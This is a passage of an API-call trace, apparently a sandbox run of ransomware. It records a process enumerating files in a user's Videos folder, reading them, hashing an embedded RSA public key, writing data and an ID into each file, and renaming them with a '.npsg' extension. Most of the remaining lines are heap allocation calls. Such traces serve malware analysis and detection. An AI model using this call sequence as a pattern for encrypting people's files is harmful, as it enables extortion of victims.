RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd0) returned 0x3397a08 [0240.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8d0) returned 0x3b8bcd0 [0240.938] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\dLXPSgTqJi3y2\\T54477owgqw5YJ5A9Ny.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\dlxpsgtqji3y2\\t54477owgqw5yj5a9ny.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\dLXPSgTqJi3y2\\T54477owgqw5YJ5A9Ny.mkv.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\dlxpsgtqji3y2\\t54477owgqw5yj5a9ny.mkv.npsg")) returned 1 [0240.940] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf66b780, ftCreationTime.dwHighDateTime=0x1d5bd9e, ftLastAccessTime.dwLowDateTime=0x1a1818e0, ftLastAccessTime.dwHighDateTime=0x1d5b87c, ftLastWriteTime.dwLowDateTime=0x1a1818e0, ftLastWriteTime.dwHighDateTime=0x1d5b87c, nFileSizeHigh=0x0, nFileSizeLow=0x5bab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vwVbmkZ6M1.flv", cAlternateFileName="VWVBMK~1.FLV")) returned 1 [0240.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0240.940] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xee) returned 0x33b8188 [0240.940] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\dLXPSgTqJi3y2\\vwVbmkZ6M1.flv") returned=".flv" [0240.940] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\dLXPSgTqJi3y2\\vwVbmkZ6M1.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\dlxpsgtqji3y2\\vwvbmkz6m1.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0240.940] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=23467) returned 1 [0240.940] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0240.943] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x5b85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0240.944] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0240.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0240.945] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x5bab, lpOverlapped=0x0) returned 1 [0240.946] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0240.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0240.946] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0240.946] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0240.946] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a3b8) returned 1 [0240.948] CryptCreateHash (in: hProv=0x67a3b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0240.948] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0240.948] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0240.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0240.948] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0240.948] GetLastError () returned 0x0 [0240.948] CryptDestroyHash (hHash=0x33f0408) returned 1 [0240.948] CryptReleaseContext (hProv=0x67a3b8, dwFlags=0x0) returned 1 [0240.948] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0240.948] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0240.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0240.948] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0240.948] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0240.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0240.949] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x5bab, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0240.949] WriteFile (in: hFile=0x644, lpBuffer=0x6affc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x6affc0*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0240.949] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0240.949] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0240.949] CloseHandle (hObject=0x644) returned 1 [0240.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393c58 [0240.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3b8bcd0 [0240.952] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\dLXPSgTqJi3y2\\vwVbmkZ6M1.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\dlxpsgtqji3y2\\vwvbmkz6m1.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\dLXPSgTqJi3y2\\vwVbmkZ6M1.flv.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\dlxpsgtqji3y2\\vwvbmkz6m1.flv.npsg")) returned 1 [0240.954] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf66b780, ftCreationTime.dwHighDateTime=0x1d5bd9e, ftLastAccessTime.dwLowDateTime=0x1a1818e0, ftLastAccessTime.dwHighDateTime=0x1d5b87c, ftLastWriteTime.dwLowDateTime=0x1a1818e0, ftLastWriteTime.dwHighDateTime=0x1d5b87c, nFileSizeHigh=0x0, nFileSizeLow=0x5bab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vwVbmkZ6M1.flv", cAlternateFileName="VWVBMK~1.FLV")) returned 0 [0240.954] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0240.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0240.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d7c0 | out: hHeap=0x620000) returned 1 [0240.954] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0240.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a5d8 | out: hHeap=0x620000) returned 1 [0240.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0240.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d9b8 | out: hHeap=0x620000) returned 1 [0240.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a088 | out: hHeap=0x620000) returned 1 [0240.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e728 | out: hHeap=0x620000) returned 1 [0240.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64ebe8 | out: hHeap=0x620000) returned 1 [0240.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64ec80 | out: hHeap=0x620000) returned 1 [0240.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d868 | out: hHeap=0x620000) returned 1 [0240.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a220 | out: hHeap=0x620000) returned 1 [0240.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e988 | out: hHeap=0x620000) returned 1 [0240.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eb50 | out: hHeap=0x620000) returned 1 [0240.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8db08 | out: hHeap=0x620000) returned 1 [0240.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83ce8 | out: hHeap=0x620000) returned 1 [0240.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eb50 [0240.955] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0240.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0240.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0240.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0240.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0240.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0240.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0240.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0240.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0240.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0240.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0240.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0240.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0240.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0240.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0240.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0240.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0240.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64eab8 [0240.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0240.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0240.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64eab8 | out: hHeap=0x620000) returned 1 [0240.961] RtlAllocateHeap 